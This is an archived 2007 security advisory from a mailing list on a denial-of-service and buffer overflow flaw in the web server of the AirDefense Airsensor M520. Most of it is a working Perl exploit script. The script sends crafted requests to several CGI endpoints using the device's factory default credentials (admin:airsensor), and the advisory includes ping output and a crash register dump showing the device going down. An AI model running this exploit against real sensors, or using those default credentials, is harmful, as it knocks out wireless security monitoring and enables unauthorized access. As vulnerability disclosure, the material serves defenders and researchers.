[EXPL] Airsensor M520 HTTPD Preauth DoS and Buffer Overflow (Exploit)

2007-10-01T00:00:00
ID SECURITYVULNS:DOC:18097
Type securityvulns
Reporter Securityvulns
Modified 2007-10-01T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html


Airsensor M520 HTTPD Preauth DoS and Buffer Overflow (Exploit)

SUMMARY

A vulnerability in Airsensor M520 is caused due to an unspecified error in the CGIs files filter used for configure proprieties. This can be exploited by sending a specially crafted HTTPS request (necessary authentication), which will cause the HTTPS service on the system to crash.

DETAILS

Exploit:

!/usr/bin/perl -w

Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer

Overflow PoC

The vulnerability is caused due to an unspecified error in the cgis

files filter used for configure propierties. This can be exploited by

sending a specially crafted HTTPS request (necessary authentication),

which will cause the HTTPS service on the system to crash.

Requisites: "Use DHCP" option interface mark "No"

Examples:

GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1

GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1

GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1

Pinging:

Before:

Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

Reply from 192.168.100.100: bytes=32 time<1ms TTL=64

After:

Hardware error.

Hardware error.

Hardware error.

Request timed out.

Request timed out.

Request timed out.

C:\>nc -vvn 192.168.100.100 443

(UNKNOWN) [192.168.100.100] 443 (?): connection refused

sent 0, rcvd 0: NOTSOCK

Buffer Overflow debug log:

1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4,

Model = M520

1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR

1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4

1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51

1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55

1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved

Instruction)

1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD

1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:

1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe

v0=0x00000000 v1=0x00000000

1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000

a2=0x00000010 a3=0x00000041

1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d

t2=0x0000000b t3=0x00000000

1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f

t6=0x0066a1a4 t7=0x4df0e494

1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f

s2=0x802f7910 s3=0x80120000

1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30

s6=0x80120000 s7=0x80128afc

1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136

k0=0x802f78c8 k1=0x802f7910

1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910

fp=0x80128aec ra=0x800b2534

1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused

exception = 0x800b2534

1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress

exception occured = 0x00000000

1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534

1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03

1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000

1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028

1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb

1970-01-01 00:00:17 SYS-CRIT:: Vector = 40

1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009

1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return

address

1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf

1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000

1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000

1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000

1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4

1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18

1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8

1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf

1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30

1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200

1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return

address

1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074

1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:

The vulnerability has been reported in versions Airdefense

Firmware Version 4.3.1.1, Model = M520

Firmware version 4.4.1.4, Model = M520

More information: http://www.airdefense.net

http://support.airdefense.net

Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.

and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,

pikah, codebreak, h3llfyr3

Alex Hernandez ahernandez [at] sybsecurity dot com

use strict; use LWP; use Data::Dumper; require HTTP::Request; require HTTP::Headers;

my $string = "%41%41%41"; # Strings to send my $method = 'GET'; # Method "GET" or "POST" my $uri = 'https://192.168.100.100'; # Factory default IP address my $content = "/adLog.cgi?"; # Cgi's file to crash

my $content = "/ad.cgi?";

my $content = "/post.cgi?";

my $content = "/logout.cgi?";

my $headers = HTTP::Headers->new(

'Host:' => '192.168.100.100', 'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', 'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5', 'Accept-Language:' => 'en-us,en;q=0.5', 'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive:' => '300', 'Connection:' => 'keep-alive', 'Referer:' => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh', 'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor

);

my $request = HTTP::Request->new($method, $uri, $headers, $content, $string);

my $ua = LWP::UserAgent->new; my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n"; print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; print "[+] We got this response from sensor: \n\n" . $response->content . "\n";

my $data; foreach my $pair (split('&', $response->content)) { my ($k, $v) = split('=', $pair); $data->{$k} = $v; }

if ($data->{RESULT} != 0) {

print "[+] Denial of Service exploit for Airsensor M520 Final\n"; print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; print "[+] Use:\n"; print "\tperl -x dos_sensor.pl\n"; print $data->{RESPMSG} . "\n"; exit(0);

} else {

print "[+] Denial of service Exploit successed!!!\n"; print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; }

milw0rm.com [2007-09-18]

ADDITIONAL INFORMATION

The information has been provided by <mailto:ahernandez@sybsecurity.com> Alex Hernandez.

========================================

This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.